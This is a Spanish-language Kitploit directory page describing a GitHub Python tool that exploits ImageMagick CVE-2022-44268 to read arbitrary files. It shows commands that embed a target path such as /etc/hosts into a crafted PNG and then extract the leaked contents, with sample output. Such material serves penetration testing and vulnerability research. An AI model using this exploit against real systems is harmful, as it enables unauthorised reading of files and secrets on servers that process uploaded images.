Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2022-44268 — Generador de exploits en Python para la vulnerabilidad de inclusión de archivos locales CVE-2022-44268 de ImageMagick. Crea archivos PNG maliciosos para leer archivos arbitrarios en sistemas vulnerables. | Kitploit
Herramientas/GitHubGitHub/pog-frog/cve-2022-44268
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubpog-frog/cve-2022-44268

cve-2022-44268

Generador de exploits en Python para la vulnerabilidad de inclusión de archivos locales CVE-2022-44268 de ImageMagick. Crea archivos PNG maliciosos para leer archivos arbitrarios en sistemas vulnerables.

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-44268

ImageMagick es un paquete de software multiplataforma gratuito y de código abierto para visualizar, convertir y editar imágenes rasterizadas y vectoriales. Puede leer y escribir más de 200 formatos de archivo de imagen. ImageMagick está bajo la licencia Apache 2.0. Está disponible como herramientas de línea de comandos, así como una API en C y un conjunto de clases en C++. Wikipedia

ImageMagick versiones 7.1.0-40 e inferiores son vulnerables a una vulnerabilidad de inclusión de archivos locales (Local File Inclusion). La vulnerabilidad se debe a una validación incorrecta de la entrada proporcionada por el usuario. Un atacante puede explotar esta vulnerabilidad enviando un archivo PNG manipulado al objetivo. La explotación exitosa podría permitir a un atacante leer archivos arbitrarios en el sistema objetivo.

Crédito a los investigadores que descubrieron esto:

  • Bryan Gonzalez y el equipo Ocelot

Crear un PNG malicioso para aprovechar ImageMagick 7.1.0-40:

  • CVE-2022-44267: Denegación de servicio
  • CVE-2022-44268: Divulgación de información

Requisitos

  • Python3
  • PIL (pip install Pillow)

Uso

Crear un PNG con generate.py:

root@kitploit:~
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Insertando Payload para leer el archivo objetivo
   [*] PNG de explotación generado: exploit.png

PoC

root@kitploit:~
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Descargo de responsabilidad: Sé buena persona, por favor no lo uses para malas acciones.

Descargar herramienta